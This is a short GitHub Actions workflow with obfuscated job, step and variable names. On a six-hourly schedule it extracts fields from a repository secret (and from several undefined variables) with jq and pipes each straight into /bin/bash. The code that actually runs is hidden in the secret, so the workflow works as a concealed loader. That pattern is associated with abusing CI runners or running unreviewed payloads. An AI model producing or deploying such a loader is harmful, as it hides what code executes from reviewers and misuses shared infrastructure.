name: tengluosai4318
on:
  workflow_dispatch:
  schedule:
    - cron: '10 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tengluosai4318
        env:
          ucag53602: ${{ secrets.ucag53602 }}
        run: |
          echo $ucag53602 | jq -r .e276 | /bin/bash
          echo $gdrru4551 | jq -r .fh9312 | /bin/bash
          echo $ikm1148 | jq -r .kfktd79 | /bin/bash
          echo $nq37 | jq -r .f98820 | /bin/bash
          echo $za69 | jq -r .tlzs83559 | /bin/bash

